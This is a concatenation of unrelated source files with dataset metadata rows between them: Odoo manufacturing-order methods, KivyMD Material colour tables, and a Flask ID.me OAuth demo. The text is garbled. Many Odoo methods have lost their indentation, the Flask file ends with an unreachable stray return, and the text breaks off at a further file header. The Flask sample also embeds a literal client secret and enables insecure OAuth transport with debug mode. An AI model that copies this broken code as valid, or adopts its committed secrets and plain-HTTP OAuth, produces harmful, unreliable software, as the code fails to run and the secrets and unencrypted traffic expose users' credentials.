                consume_lines.append({'product_id': prod, 'product_qty': qty, 'lot_id': lot})
        return consume_lines
    def action_produce(self, cr, uid, production_id, production_qty, production_mode, wiz=False, context=None):
        """ To produce final product based on production mode (consume/consume&produce).
        If Production mode is consume, all stock move lines of raw materials will be done/consumed.
        If Production mode is consume & produce, all stock move lines of raw materials will be done/consumed
        and stock move lines of final product will be also done/produced.
        @param production_id: the ID of mrp.production object
        @param production_qty: specify qty to produce in the uom of the production order
        @param production_mode: specify production mode (consume/consume&produce).
        @param wiz: the mrp produce product wizard, which will tell the amount of consumed products needed
        @return: True
        """
        stock_mov_obj = self.pool.get('stock.move')
        uom_obj = self.pool.get("product.uom")
        production = self.browse(cr, uid, production_id, context=context)
        # Requested quantity converted from the order UoM to the product UoM.
        production_qty_uom = uom_obj._compute_qty(cr, uid, production.product_uom.id, production_qty, production.product_id.uom_id.id)
        main_production_move = False
        if production_mode == 'consume_produce':
            # To produce remaining qty of final product
            produced_products = {}
            for produced_product in production.move_created_ids2:
                if produced_product.scrapped:
                    continue
                if not produced_products.get(produced_product.product_id.id, False):
                    produced_products[produced_product.product_id.id] = 0
                produced_products[produced_product.product_id.id] += produced_product.product_qty
            for produce_product in production.move_created_ids:
                # subproduct_factor is 1 here unless mrp_subproduct overrides it.
                subproduct_factor = self._get_subproduct_factor(cr, uid, production.id, produce_product.id, context=context)
                lot_id = False
                if wiz:
                    lot_id = wiz.lot_id.id
                qty = min(subproduct_factor * production_qty_uom, produce_product.product_qty) #Needed when producing more than maximum quantity
                new_moves = stock_mov_obj.action_consume(cr, uid, [produce_product.id], qty,
                                                         location_id=produce_product.location_id.id, restrict_lot_id=lot_id, context=context)
                stock_mov_obj.write(cr, uid, new_moves, {'production_id': production_id}, context=context)
                remaining_qty = subproduct_factor * production_qty_uom - qty
                if remaining_qty: # In case you need to make more than planned
                    #consumed more in wizard than previously planned
                    extra_move_id = stock_mov_obj.copy(cr, uid, produce_product.id, default={'state': 'confirmed',
                                                                                            'product_uom_qty': remaining_qty,
                                                                                            'production_id': production_id}, context=context)
                    if extra_move_id:
                        stock_mov_obj.action_done(cr, uid, [extra_move_id], context=context)
                if produce_product.product_id.id == production.product_id.id:
                    # Remember the move of the main product: the raw-material
                    # consumptions below are linked to it (consumed_for).
                    main_production_move = produce_product.id
        if production_mode in ['consume', 'consume_produce']:
            if wiz:
                # The wizard dictates exactly what to consume, lot by lot.
                consume_lines = []
                for cons in wiz.consume_lines:
                    consume_lines.append({'product_id': cons.product_id.id, 'lot_id': cons.lot_id.id, 'product_qty': cons.product_qty})
            else:
                consume_lines = self._calculate_qty(cr, uid, production, production_qty_uom, context=context)
            for consume in consume_lines:
                remaining_qty = consume['product_qty']
                for raw_material_line in production.move_lines:
                    if remaining_qty <= 0:
                        break
                    if consume['product_id'] != raw_material_line.product_id.id:
                        continue
                    consumed_qty = min(remaining_qty, raw_material_line.product_qty)
                    stock_mov_obj.action_consume(cr, uid, [raw_material_line.id], consumed_qty, raw_material_line.location_id.id,
                                                 restrict_lot_id=consume['lot_id'], consumed_for=main_production_move, context=context)
                    remaining_qty -= consumed_qty
                if remaining_qty:
                    #consumed more in wizard than previously planned
                    product = self.pool.get('product.product').browse(cr, uid, consume['product_id'], context=context)
                    extra_move_id = self._make_consume_line_from_data(cr, uid, production, product, product.uom_id.id, remaining_qty, False, 0, context=context)
                    if extra_move_id:
                        if consume['lot_id']:
                            stock_mov_obj.write(cr, uid, [extra_move_id], {'restrict_lot_id': consume['lot_id']}, context=context)
                        stock_mov_obj.action_done(cr, uid, [extra_move_id], context=context)
        self.message_post(cr, uid, production_id, body=_("%s produced") % self._description, context=context)
        self.signal_workflow(cr, uid, [production_id], 'button_produce_done')
        return True
    def _costs_generate(self, cr, uid, production):
        """ Calculates total costs at the end of the production.

        Posts one analytic line per work-center line for hourly cost and one
        for per-cycle cost, whenever the work center has an analytic journal,
        a general account, and a non-zero cost/account pair.
        @param production: browse record of the production order.
        @return: Calculated amount.
        """
        amount = 0.0
        analytic_line_obj = self.pool.get('account.analytic.line')
        for wc_line in production.workcenter_lines:
            wc = wc_line.workcenter_id
            if wc.costs_journal_id and wc.costs_general_account_id:
                # Cost per hour
                value = wc_line.hour * wc.costs_hour
                account = wc.costs_hour_account_id.id
                if value and account:
                    amount += value
                    # we use SUPERUSER_ID as we do not guarantee an mrp user
                    # has access to account analytic lines but still should be
                    # able to produce orders
                    analytic_line_obj.create(cr, SUPERUSER_ID, {
                        'name': wc_line.name + ' (H)',
                        'amount': value,
                        'account_id': account,
                        'general_account_id': wc.costs_general_account_id.id,
                        'journal_id': wc.costs_journal_id.id,
                        'ref': wc.code,
                        'product_id': wc.product_id.id,
                        'unit_amount': wc_line.hour,
                        'product_uom_id': wc.product_id and wc.product_id.uom_id.id or False
                    })
                # Cost per cycle
                value = wc_line.cycle * wc.costs_cycle
                account = wc.costs_cycle_account_id.id
                if value and account:
                    amount += value
                    analytic_line_obj.create(cr, SUPERUSER_ID, {
                        'name': wc_line.name + ' (C)',
                        'amount': value,
                        'account_id': account,
                        'general_account_id': wc.costs_general_account_id.id,
                        'journal_id': wc.costs_journal_id.id,
                        'ref': wc.code,
                        'product_id': wc.product_id.id,
                        'unit_amount': wc_line.cycle,
                        'product_uom_id': wc.product_id and wc.product_id.uom_id.id or False
                    })
        return amount
def action_in_production(self, cr, uid, ids, context=None):
""" Changes state to In Production and writes starting date.
@return: True
"""
return self.write(cr, uid, ids, {'state': 'in_production', 'date_start': time.strftime('%Y-%m-%d %H:%M:%S')})
def consume_lines_get(self, cr, uid, ids, *args):
res = []
for order in self.browse(cr, uid, ids, context={}):
res += [x.id for x in order.move_lines]
return res
def test_ready(self, cr, uid, ids):
res = True
for production in self.browse(cr, uid, ids):
if production.move_lines and not production.ready_production:
res = False
return res
    def _make_production_produce_line(self, cr, uid, production, context=None):
        """Create and confirm the finished-product stock move of an order.

        The move goes from the product's virtual production location to the
        order's destination, and is linked to the procurement that generated
        the order, when there is one.
        @return: id of the confirmed stock move
        """
        stock_move = self.pool.get('stock.move')
        proc_obj = self.pool.get('procurement.order')
        source_location_id = production.product_id.property_stock_production.id
        destination_location_id = production.location_dest_id.id
        procs = proc_obj.search(cr, uid, [('production_id', '=', production.id)], context=context)
        procurement_id = procs and procs[0] or False
        data = {
            'name': production.name,
            'date': production.date_planned,
            'product_id': production.product_id.id,
            'product_uom': production.product_uom.id,
            'product_uom_qty': production.product_qty,
            'product_uos_qty': production.product_uos and production.product_uos_qty or False,
            'product_uos': production.product_uos and production.product_uos.id or False,
            'location_id': source_location_id,
            'location_dest_id': destination_location_id,
            'move_dest_id': production.move_prod_id.id,
            'procurement_id': procurement_id,
            'company_id': production.company_id.id,
            'production_id': production.id,
            'origin': production.name,
        }
        move_id = stock_move.create(cr, uid, data, context=context)
        #a phantom bom cannot be used in mrp order so it's ok to assume the list returned by action_confirm
        #is 1 element long, so we can take the first.
        return stock_move.action_confirm(cr, uid, [move_id], context=context)[0]
def _get_raw_material_procure_method(self, cr, uid, product, context=None):
'''This method returns the procure_method to use when creating the stock move for the production raw materials'''
warehouse_obj = self.pool['stock.warehouse']
try:
mto_route = warehouse_obj._get_mto_route(cr, uid, context=context)
except:
return "make_to_stock"
routes = product.route_ids + product.categ_id.total_route_ids
if mto_route in [x.id for x in routes]:
return "make_to_order"
return "make_to_stock"
    def _create_previous_move(self, cr, uid, move_id, product, source_location_id, dest_location_id, context=None):
        '''
        When the routing gives a different location than the raw material location of the production order,
        we should create an extra move from the raw material location to the location of the routing, which
        precedes the consumption line (chained). The picking type depends on the warehouse in which this happens
        and the type of locations.
        '''
        loc_obj = self.pool.get("stock.location")
        stock_move = self.pool.get('stock.move')
        type_obj = self.pool.get('stock.picking.type')
        # Need to search for a picking type
        move = stock_move.browse(cr, uid, move_id, context=context)
        src_loc = loc_obj.browse(cr, uid, source_location_id, context=context)
        dest_loc = loc_obj.browse(cr, uid, dest_location_id, context=context)
        code = stock_move.get_code_from_locs(cr, uid, move, src_loc, dest_loc, context=context)
        # For outgoing moves the warehouse is determined by the source side,
        # otherwise by the destination side.
        if code == 'outgoing':
            check_loc = src_loc
        else:
            check_loc = dest_loc
        wh = loc_obj.get_warehouse(cr, uid, check_loc, context=context)
        domain = [('code', '=', code)]
        if wh:
            domain += [('warehouse_id', '=', wh)]
        types = type_obj.search(cr, uid, domain, context=context)
        # Chained predecessor: same move, re-routed, feeding the consume move.
        move = stock_move.copy(cr, uid, move_id, default = {
            'location_id': source_location_id,
            'location_dest_id': dest_location_id,
            'procure_method': self._get_raw_material_procure_method(cr, uid, product, context=context),
            'raw_material_production_id': False,
            'move_dest_id': move_id,
            'picking_type_id': types and types[0] or False,
        }, context=context)
        return move
    def _make_consume_line_from_data(self, cr, uid, production, product, uom_id, qty, uos_id, uos_qty, context=None):
        """Create one raw-material consume move for the given order.

        Skips non-stockable products.  When the order's routing imposes an
        operation location different from the raw-material location, the
        consume move starts there and a chained predecessor move is created
        via _create_previous_move.
        @return: id of the created consume move, or False for service products
        """
        stock_move = self.pool.get('stock.move')
        loc_obj = self.pool.get('stock.location')
        # Internal shipment is created for Stockable and Consumer Products
        if product.type not in ('product', 'consu'):
            return False
        # Take routing location as a Source Location.
        source_location_id = production.location_src_id.id
        prod_location_id = source_location_id
        prev_move= False
        if production.bom_id.routing_id and production.bom_id.routing_id.location_id and production.bom_id.routing_id.location_id.id != source_location_id:
            source_location_id = production.bom_id.routing_id.location_id.id
            prev_move = True
        destination_location_id = production.product_id.property_stock_production.id
        move_id = stock_move.create(cr, uid, {
            'name': production.name,
            'date': production.date_planned,
            'product_id': product.id,
            'product_uom_qty': qty,
            'product_uom': uom_id,
            'product_uos_qty': uos_id and uos_qty or False,
            'product_uos': uos_id or False,
            'location_id': source_location_id,
            'location_dest_id': destination_location_id,
            'company_id': production.company_id.id,
            'procure_method': prev_move and 'make_to_stock' or self._get_raw_material_procure_method(cr, uid, product, context=context), #Make_to_stock avoids creating procurement
            'raw_material_production_id': production.id,
            #this saves us a browse in create()
            'price_unit': product.standard_price,
            'origin': production.name,
            'warehouse_id': loc_obj.get_warehouse(cr, uid, production.location_src_id, context=context),
        }, context=context)
        if prev_move:
            prev_move = self._create_previous_move(cr, uid, move_id, product, prod_location_id, source_location_id, context=context)
            stock_move.action_confirm(cr, uid, [prev_move], context=context)
        return move_id
def _make_production_consume_line(self, cr, uid, line, context=None):
return self._make_consume_line_from_data(cr, uid, line.production_id, line.product_id, line.product_uom.id, line.product_qty, line.product_uos.id, line.product_uos_qty, context=context)
def _make_service_procurement(self, cr, uid, line, context=None):
prod_obj = self.pool.get('product.product')
if prod_obj.need_procurement(cr, uid, [line.product_id.id], context=context):
vals = {
'name': line.production_id.name,
'origin': line.production_id.name,
'company_id': line.production_id.company_id.id,
'date_planned': line.production_id.date_planned,
'product_id': line.product_id.id,
'product_qty': line.product_qty,
'product_uom': line.product_uom.id,
'product_uos_qty': line.product_uos_qty,
'product_uos': line.product_uos.id,
}
proc_obj = self.pool.get("procurement.order")
proc = proc_obj.create(cr, uid, vals, context=context)
proc_obj.run(cr, uid, [proc], context=context)
def action_confirm(self, cr, uid, ids, context=None):
""" Confirms production order.
@return: Newly generated Shipment Id.
"""
uncompute_ids = filter(lambda x: x, [not x.product_lines and x.id or False for x in self.browse(cr, uid, ids, context=context)])
self.action_compute(cr, uid, uncompute_ids, context=context)
for production in self.browse(cr, uid, ids, context=context):
self._make_production_produce_line(cr, uid, production, context=context)
stock_moves = []
for line in production.product_lines:
if line.product_id.type != 'service':
stock_move_id = self._make_production_consume_line(cr, uid, line, context=context)
stock_moves.append(stock_move_id)
else:
self._make_service_procurement(cr, uid, line, context=context)
if stock_moves:
self.pool.get('stock.move').action_confirm(cr, uid, stock_moves, context=context)
production.write({'state': 'confirmed'}, context=context)
return 0
def action_assign(self, cr, uid, ids, context=None):
"""
Checks the availability on the consume lines of the production order
"""
from openerp import workflow
move_obj = self.pool.get("stock.move")
for production in self.browse(cr, uid, ids, context=context):
move_obj.action_assign(cr, uid, [x.id for x in production.move_lines], context=context)
if self.pool.get('mrp.production').test_ready(cr, uid, [production.id]):
workflow.trg_validate(uid, 'mrp.production', production.id, 'moves_ready', cr)
def force_production(self, cr, uid, ids, *args):
""" Assigns products.
@param *args: Arguments
@return: True
"""
from openerp import workflow
move_obj = self.pool.get('stock.move')
for order in self.browse(cr, uid, ids):
move_obj.force_assign(cr, uid, [x.id for x in order.move_lines])
if self.pool.get('mrp.production').test_ready(cr, uid, [order.id]):
workflow.trg_validate(uid, 'mrp.production', order.id, 'moves_ready', cr)
return True
class mrp_production_workcenter_line(osv.osv):
    """One work order: planned effort of a production order on a work center."""
    _name = 'mrp.production.workcenter.line'
    _description = 'Work Order'
    _order = 'sequence'
    _inherit = ['mail.thread']
    _columns = {
        'name': fields.char('Work Order', required=True),
        'workcenter_id': fields.many2one('mrp.workcenter', 'Work Center', required=True),
        # Planned effort on the work center, in machine cycles and in hours.
        'cycle': fields.float('Number of Cycles', digits=(16, 2)),
        'hour': fields.float('Number of Hours', digits=(16, 2)),
        'sequence': fields.integer('Sequence', required=True, help="Gives the sequence order when displaying a list of work orders."),
        # ondelete='cascade': deleting the production order removes its work orders.
        'production_id': fields.many2one('mrp.production', 'Manufacturing Order',
            track_visibility='onchange', select=True, ondelete='cascade', required=True),
    }
    _defaults = {
        'sequence': lambda *a: 1,
        'hour': lambda *a: 0,
        'cycle': lambda *a: 0,
    }
class mrp_production_product_line(osv.osv):
    """A scheduled (to-consume) product of a manufacturing order, as computed
    from the bill of materials."""
    _name = 'mrp.production.product.line'
    _description = 'Production Scheduled Product'
    _columns = {
        'name': fields.char('Name', required=True),
        'product_id': fields.many2one('product.product', 'Product', required=True),
        'product_qty': fields.float('Product Quantity', digits_compute=dp.get_precision('Product Unit of Measure'), required=True),
        'product_uom': fields.many2one('product.uom', 'Product Unit of Measure', required=True),
        # Optional secondary unit (unit of sale) quantity and UoM.
        'product_uos_qty': fields.float('Product UOS Quantity'),
        'product_uos': fields.many2one('product.uom', 'Product UOS'),
        'production_id': fields.many2one('mrp.production', 'Production Order', select=True),
    }
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| 55.004796 | 296 | 0.623127 |
68248ac2d1682f92f828c55915f6ad28252796d0 | 21,214 | py | Python | kivymd/color_definitions.py | mahonec/KivyMD | 6f1515112852e2b21ef227cd8df8f87910ed92b6 | [
"MIT"
] | 1 | 2020-07-01T12:39:51.000Z | 2020-07-01T12:39:51.000Z | kivymd/color_definitions.py | mahonec/KivyMD | 6f1515112852e2b21ef227cd8df8f87910ed92b6 | [
"MIT"
] | 1 | 2020-05-15T10:09:15.000Z | 2020-05-15T10:09:15.000Z | kivymd/color_definitions.py | mahonec/KivyMD | 6f1515112852e2b21ef227cd8df8f87910ed92b6 | [
"MIT"
] | null | null | null | """
Themes/Color Definitions
========================
.. seealso::
`Material Design spec, The color system <https://material.io/design/color/the-color-system.html>`_
Material colors palette to use in :class:`kivymd.theming.ThemeManager`.
:data:`~colors` is a dict-in-dict where the first key is a value from
:data:`~palette` and the second key is a value from :data:`~hue`. Color is a hex
value, a string of 6 characters (0-9, A-F) written in uppercase.
For example, ``colors["Red"]["900"]`` is ``"B71C1C"``.
"""
# 2014 Material Design color palettes. For every palette the ten numbered
# shades "50".."900" and the four accents "A100".."A700" are present, so
# ``colors[p][h]`` is valid for every ``p`` in ``palette`` and ``h`` in
# ``hue``. Values are RRGGBB hex strings without a leading "#".
# Fix vs. previous revision: "Purple" had a malformed "A400" value
# ("D500F9FF", 8 digits) and was missing "A700" entirely, which made code
# iterating over ``hue`` raise KeyError on the Purple palette.
colors = {
    "Red": {
        "50": "FFEBEE", "100": "FFCDD2", "200": "EF9A9A", "300": "E57373",
        "400": "EF5350", "500": "F44336", "600": "E53935", "700": "D32F2F",
        "800": "C62828", "900": "B71C1C",
        "A100": "FF8A80", "A200": "FF5252", "A400": "FF1744", "A700": "D50000",
    },
    "Pink": {
        "50": "FCE4EC", "100": "F8BBD0", "200": "F48FB1", "300": "F06292",
        "400": "EC407A", "500": "E91E63", "600": "D81B60", "700": "C2185B",
        "800": "AD1457", "900": "880E4F",
        "A100": "FF80AB", "A200": "FF4081", "A400": "F50057", "A700": "C51162",
    },
    "Purple": {
        "50": "F3E5F5", "100": "E1BEE7", "200": "CE93D8", "300": "BA68C8",
        "400": "AB47BC", "500": "9C27B0", "600": "8E24AA", "700": "7B1FA2",
        "800": "6A1B9A", "900": "4A148C",
        "A100": "EA80FC", "A200": "E040FB", "A400": "D500F9", "A700": "AA00FF",
    },
    "DeepPurple": {
        "50": "EDE7F6", "100": "D1C4E9", "200": "B39DDB", "300": "9575CD",
        "400": "7E57C2", "500": "673AB7", "600": "5E35B1", "700": "512DA8",
        "800": "4527A0", "900": "311B92",
        "A100": "B388FF", "A200": "7C4DFF", "A400": "651FFF", "A700": "6200EA",
    },
    "Indigo": {
        "50": "E8EAF6", "100": "C5CAE9", "200": "9FA8DA", "300": "7986CB",
        "400": "5C6BC0", "500": "3F51B5", "600": "3949AB", "700": "303F9F",
        "800": "283593", "900": "1A237E",
        "A100": "8C9EFF", "A200": "536DFE", "A400": "3D5AFE", "A700": "304FFE",
    },
    "Blue": {
        "50": "E3F2FD", "100": "BBDEFB", "200": "90CAF9", "300": "64B5F6",
        "400": "42A5F5", "500": "2196F3", "600": "1E88E5", "700": "1976D2",
        "800": "1565C0", "900": "0D47A1",
        "A100": "82B1FF", "A200": "448AFF", "A400": "2979FF", "A700": "2962FF",
    },
    "LightBlue": {
        "50": "E1F5FE", "100": "B3E5FC", "200": "81D4FA", "300": "4FC3F7",
        "400": "29B6F6", "500": "03A9F4", "600": "039BE5", "700": "0288D1",
        "800": "0277BD", "900": "01579B",
        "A100": "80D8FF", "A200": "40C4FF", "A400": "00B0FF", "A700": "0091EA",
    },
    "Cyan": {
        "50": "E0F7FA", "100": "B2EBF2", "200": "80DEEA", "300": "4DD0E1",
        "400": "26C6DA", "500": "00BCD4", "600": "00ACC1", "700": "0097A7",
        "800": "00838F", "900": "006064",
        "A100": "84FFFF", "A200": "18FFFF", "A400": "00E5FF", "A700": "00B8D4",
    },
    "Teal": {
        "50": "E0F2F1", "100": "B2DFDB", "200": "80CBC4", "300": "4DB6AC",
        "400": "26A69A", "500": "009688", "600": "00897B", "700": "00796B",
        "800": "00695C", "900": "004D40",
        "A100": "A7FFEB", "A200": "64FFDA", "A400": "1DE9B6", "A700": "00BFA5",
    },
    "Green": {
        "50": "E8F5E9", "100": "C8E6C9", "200": "A5D6A7", "300": "81C784",
        "400": "66BB6A", "500": "4CAF50", "600": "43A047", "700": "388E3C",
        "800": "2E7D32", "900": "1B5E20",
        "A100": "B9F6CA", "A200": "69F0AE", "A400": "00E676", "A700": "00C853",
    },
    "LightGreen": {
        "50": "F1F8E9", "100": "DCEDC8", "200": "C5E1A5", "300": "AED581",
        "400": "9CCC65", "500": "8BC34A", "600": "7CB342", "700": "689F38",
        "800": "558B2F", "900": "33691E",
        "A100": "CCFF90", "A200": "B2FF59", "A400": "76FF03", "A700": "64DD17",
    },
    "Lime": {
        "50": "F9FBE7", "100": "F0F4C3", "200": "E6EE9C", "300": "DCE775",
        "400": "D4E157", "500": "CDDC39", "600": "C0CA33", "700": "AFB42B",
        "800": "9E9D24", "900": "827717",
        "A100": "F4FF81", "A200": "EEFF41", "A400": "C6FF00", "A700": "AEEA00",
    },
    "Yellow": {
        "50": "FFFDE7", "100": "FFF9C4", "200": "FFF59D", "300": "FFF176",
        "400": "FFEE58", "500": "FFEB3B", "600": "FDD835", "700": "FBC02D",
        "800": "F9A825", "900": "F57F17",
        "A100": "FFFF8D", "A200": "FFFF00", "A400": "FFEA00", "A700": "FFD600",
    },
    "Amber": {
        "50": "FFF8E1", "100": "FFECB3", "200": "FFE082", "300": "FFD54F",
        "400": "FFCA28", "500": "FFC107", "600": "FFB300", "700": "FFA000",
        "800": "FF8F00", "900": "FF6F00",
        "A100": "FFE57F", "A200": "FFD740", "A400": "FFC400", "A700": "FFAB00",
    },
    "Orange": {
        "50": "FFF3E0", "100": "FFE0B2", "200": "FFCC80", "300": "FFB74D",
        "400": "FFA726", "500": "FF9800", "600": "FB8C00", "700": "F57C00",
        "800": "EF6C00", "900": "E65100",
        "A100": "FFD180", "A200": "FFAB40", "A400": "FF9100", "A700": "FF6D00",
    },
    "DeepOrange": {
        "50": "FBE9E7", "100": "FFCCBC", "200": "FFAB91", "300": "FF8A65",
        "400": "FF7043", "500": "FF5722", "600": "F4511E", "700": "E64A19",
        "800": "D84315", "900": "BF360C",
        "A100": "FF9E80", "A200": "FF6E40", "A400": "FF3D00", "A700": "DD2C00",
    },
    # Brown/Gray/BlueGray define no accent colors in Material Design; black
    # placeholders keep ``colors[p][h]`` total over the full ``hue`` list.
    "Brown": {
        "50": "EFEBE9", "100": "D7CCC8", "200": "BCAAA4", "300": "A1887F",
        "400": "8D6E63", "500": "795548", "600": "6D4C41", "700": "5D4037",
        "800": "4E342E", "900": "3E2723",
        "A100": "000000", "A200": "000000", "A400": "000000", "A700": "000000",
    },
    "Gray": {
        "50": "FAFAFA", "100": "F5F5F5", "200": "EEEEEE", "300": "E0E0E0",
        "400": "BDBDBD", "500": "9E9E9E", "600": "757575", "700": "616161",
        "800": "424242", "900": "212121",
        "A100": "000000", "A200": "000000", "A400": "000000", "A700": "000000",
    },
    "BlueGray": {
        "50": "ECEFF1", "100": "CFD8DC", "200": "B0BEC5", "300": "90A4AE",
        "400": "78909C", "500": "607D8B", "600": "546E7A", "700": "455A64",
        "800": "37474F", "900": "263238",
        "A100": "000000", "A200": "000000", "A400": "000000", "A700": "000000",
    },
    # Theme surface colors keyed by UI role rather than by shade.
    "Light": {
        "StatusBar": "E0E0E0",
        "AppBar": "F5F5F5",
        "Background": "FAFAFA",
        "CardsDialogs": "FFFFFF",
        "FlatButtonDown": "cccccc",
    },
    "Dark": {
        "StatusBar": "000000",
        "AppBar": "1f1f1f",
        "Background": "121212",
        "CardsDialogs": "212121",
        "FlatButtonDown": "999999",
    },
}
"""Color palette. Taken from `2014 Material Design color palettes
<https://material.io/design/color/the-color-system.html>`_.
To demonstrate the shades of the palette, you can run the following code:
.. code-block:: python
from kivy.lang import Builder
from kivy.uix.boxlayout import BoxLayout
from kivy.utils import get_color_from_hex
from kivy.properties import ListProperty, StringProperty
from kivymd.color_definitions import colors
from kivymd.uix.tab import MDTabsBase
demo = '''
<Root@BoxLayout>
orientation: 'vertical'
MDToolbar:
title: app.title
MDTabs:
id: android_tabs
on_tab_switch: app.on_tab_switch(*args)
size_hint_y: None
height: "48dp"
tab_indicator_anim: False
ScrollView:
MDList:
id: box
<ItemColor>:
size_hint_y: None
height: "42dp"
canvas:
Color:
rgba: root.color
Rectangle:
size: self.size
pos: self.pos
MDLabel:
text: root.text
halign: "center"
<Tab>:
'''
from kivy.factory import Factory
from kivymd.app import MDApp
class Tab(BoxLayout, MDTabsBase):
pass
class ItemColor(BoxLayout):
text = StringProperty()
color = ListProperty()
class Palette(MDApp):
title = "Colors definitions"
def build(self):
Builder.load_string(demo)
self.screen = Factory.Root()
for name_tab in colors.keys():
tab = Tab(text=name_tab)
self.screen.ids.android_tabs.add_widget(tab)
return self.screen
def on_tab_switch(self, instance_tabs, instance_tab, instance_tabs_label, tab_text):
self.screen.ids.box.clear_widgets()
for value_color in colors[tab_text]:
self.screen.ids.box.add_widget(
ItemColor(
color=get_color_from_hex(colors[tab_text][value_color]),
text=value_color,
)
)
def on_start(self):
self.on_tab_switch(
None,
None,
None,
self.screen.ids.android_tabs.ids.layout.children[-1].text,
)
Palette().run()
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/palette.gif
:align: center
"""
# Names of the 19 Material Design color palettes, in display order;
# these are the valid first-level keys of ``colors`` (besides Light/Dark).
palette = [
    "Red", "Pink", "Purple", "DeepPurple", "Indigo", "Blue", "LightBlue",
    "Cyan", "Teal", "Green", "LightGreen", "Lime", "Yellow", "Amber",
    "Orange", "DeepOrange", "Brown", "Gray", "BlueGray",
]
"""Valid values for color palette selecting."""
# Shade keys available in every palette: ten numbered shades plus four
# accent ("A") shades.
hue = [
    "50", "100", "200", "300", "400", "500", "600", "700", "800", "900",
    "A100", "A200", "A400", "A700",
]
"""Valid values for color hue selecting."""
# For each palette, the hues that are "light" (i.e. need black text on top);
# every hue not listed here is considered dark. Fix vs. previous revision:
# Gray listed the non-existent hue "51" instead of "50", so the lightest
# gray was wrongly treated as dark (white text on an almost-white surface).
light_colors = {
    "Red": ["50", "100", "200", "300", "A100"],
    "Pink": ["50", "100", "200", "A100"],
    "Purple": ["50", "100", "200", "A100"],
    "DeepPurple": ["50", "100", "200", "A100"],
    "Indigo": ["50", "100", "200", "A100"],
    "Blue": ["50", "100", "200", "300", "400", "A100"],
    "LightBlue": ["50", "100", "200", "300", "400", "500",
                  "A100", "A200", "A400"],
    "Cyan": ["50", "100", "200", "300", "400", "500", "600",
             "A100", "A200", "A400", "A700"],
    "Teal": ["50", "100", "200", "300", "400", "A100", "A200", "A400", "A700"],
    "Green": ["50", "100", "200", "300", "400", "500",
              "A100", "A200", "A400", "A700"],
    "LightGreen": ["50", "100", "200", "300", "400", "500", "600",
                   "A100", "A200", "A400", "A700"],
    "Lime": ["50", "100", "200", "300", "400", "500", "600", "700", "800",
             "A100", "A200", "A400", "A700"],
    "Yellow": ["50", "100", "200", "300", "400", "500", "600", "700", "800",
               "900", "A100", "A200", "A400", "A700"],
    "Amber": ["50", "100", "200", "300", "400", "500", "600", "700", "800",
              "900", "A100", "A200", "A400", "A700"],
    "Orange": ["50", "100", "200", "300", "400", "500", "600", "700",
               "A100", "A200", "A400", "A700"],
    "DeepOrange": ["50", "100", "200", "300", "400", "A100", "A200"],
    "Brown": ["50", "100", "200"],
    "Gray": ["50", "100", "200", "300", "400", "500"],
    "BlueGray": ["50", "100", "200", "300"],
    # Theme entries use role names, not hues.
    "Dark": [],
    "Light": ["White", "MainBackground", "DialogBackground"],
}
"""Which colors are light. Other are dark."""
# Per-palette, per-hue text color: black ("000000") on light shades, white
# ("FFFFFF") on dark ones. Generated mechanically from ``light_colors``
# exactly as described in the docstring below, instead of maintaining a
# 300-line literal that can drift out of sync with ``light_colors``.
text_colors = {
    _palette_name: {
        _hue: "000000" if _hue in light_colors[_palette_name] else "FFFFFF"
        for _hue in hue
    }
    for _palette_name in palette
}
"""Text colors generated from :data:`~light_colors`. "000000" for light and
"FFFFFF" for dark.
How to generate text_colors dict
.. code-block:: python
text_colors = {}
for p in palette:
text_colors[p] = {}
for h in hue:
if h in light_colors[p]:
text_colors[p][h] = "000000"
else:
text_colors[p][h] = "FFFFFF"
"""
# Color roles addressable on the theme; "On_*" entries follow the Material
# "on-color" naming for content drawn on top of the matching surface.
theme_colors = [
    "Primary", "Secondary", "Background", "Surface", "Error",
    "On_Primary", "On_Secondary", "On_Background", "On_Surface", "On_Error",
]
"""Valid theme colors."""
| 22.448677 | 101 | 0.392995 |
8b9abb84b395bb95bd654e839b1d398e3d3a6b31 | 1,697 | py | Python | server.py | namitkumar14/PythonSampler | 1c8545b38560c59ae4eb5651fab4f018d88570ed | [
"MIT"
] | null | null | null | server.py | namitkumar14/PythonSampler | 1c8545b38560c59ae4eb5651fab4f018d88570ed | [
"MIT"
] | null | null | null | server.py | namitkumar14/PythonSampler | 1c8545b38560c59ae4eb5651fab4f018d88570ed | [
"MIT"
] | null | null | null | import os
from flask import Flask, jsonify, render_template, request, redirect, session, url_for
from requests_oauthlib import OAuth2Session
app = Flask(__name__)
# Get this information by registering your app at https://developer.id.me
# SECURITY: credentials should not live in source control. The literal
# values below are kept only as fallbacks for this demo; override them via
# environment variables in any real deployment and rotate these secrets.
client_id = os.environ.get('IDME_CLIENT_ID', '910213c3a884ff8780ae8b40d95ff687')
client_secret = os.environ.get('IDME_CLIENT_SECRET', 'ce922c92c0cd99fbfb68eaa29b237f85')
redirect_uri = os.environ.get('IDME_REDIRECT_URI', 'http://id.me')
# ID.me OAuth 2.0 endpoints.
authorization_base_url = 'https://api.id.me/oauth/authorize'
token_url = 'https://api.id.me/oauth/token'
attributes_url = 'https://api.id.me/api/public/v3/attributes.json'
# Requested scope: verification of the user's military affiliation.
scope = ['military']
@app.route("/")
def demo():
    """Landing page: serve the template containing the ID.me sign-in link."""
    index_template = "index.html"
    return render_template(index_template)
@app.route("/callback", methods=["GET"])
def callback():
    """OAuth redirect target: exchange the authorization code for a token.

    The token is persisted in the session so that ``/profile`` can fetch the
    user's attributes later from the stored credentials.
    """
    oauth = OAuth2Session(client_id, redirect_uri=redirect_uri)
    session['oauth_token'] = oauth.fetch_token(
        token_url,
        client_secret=client_secret,
        authorization_response=request.url,
    )
    return redirect(url_for('.profile'))
@app.route("/profile", methods=["GET"])
def profile():
    """Return the signed-in user's ID.me attributes as JSON.

    Uses the OAuth 2 token previously stored in the session by ``/callback``.
    """
    oauth = OAuth2Session(client_id, token=session['oauth_token'])
    attributes = oauth.get(attributes_url).json()
    session['profile'] = 'true'
    return jsonify(attributes)
return jsonify(payload)
if __name__ == "__main__":
# This allows us to use a plain HTTP callback
os.environ['DEBUG'] = "1"
os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'
app.secret_key = os.urandom(24)
app.run(debug=True)
| 33.94 | 104 | 0.701827 |
a4ed8757612ce8d0da023b344c0c06a870ad1846 | 2,224 | py | Python | dmt/phat_wrap.py | arksch/fuzzy-eureka | b3511abcef5cdc6cd4d28253d9e69f5ad1a862ec | [
"MIT"
